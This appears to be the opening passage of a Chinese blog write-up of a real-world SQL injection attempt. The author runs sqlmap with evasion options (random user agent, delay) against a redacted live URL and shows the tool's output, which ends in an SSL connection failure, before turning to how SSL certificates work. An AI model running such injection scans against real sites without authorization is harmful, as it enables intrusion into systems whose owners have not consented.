前言
随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。
【查看资料】
实战演示
通过前期的信息收集发现存在注入的页面如下:
直接使用sqlmap跑发现出现如下错误:
python2 sqlmap.py -u "http://xxxx?&daxxtae=null¶me=xxxxxx" --batch --delay=1 --random-agent
___
__H__
___ ___["]_____ ___ ___ {
1.5.4.7#dev}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:12:10 /2021-10-10/
[10.12.10] [INFO] parsing HTTP request from '49'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]Y
[10:12:10] [INFO] testing connection to the target URL
[10:12:10] [CRITICAL] can't establish SSL connection
一看无法建立SSL连接,好不容易发现一个注入点,难道就这样放弃了吗?先百度一波,看看SSL证书原理,就用一张图来理解更直接明了。